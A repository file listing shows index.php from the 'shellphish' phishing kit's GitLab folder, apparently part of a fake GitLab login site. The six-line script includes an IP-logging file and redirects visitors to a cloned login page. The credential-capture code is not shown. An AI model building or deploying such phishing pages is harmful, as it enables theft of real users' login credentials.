Files
shellphish/sites/gitlab/index.php
The Linux Choice 44553724c8 Add files via upload
2018-06-25 18:41:50 -03:00

6 lines
64 B
PHP

<?php
include 'ip.php';
header('Location: login.html');
exit
?>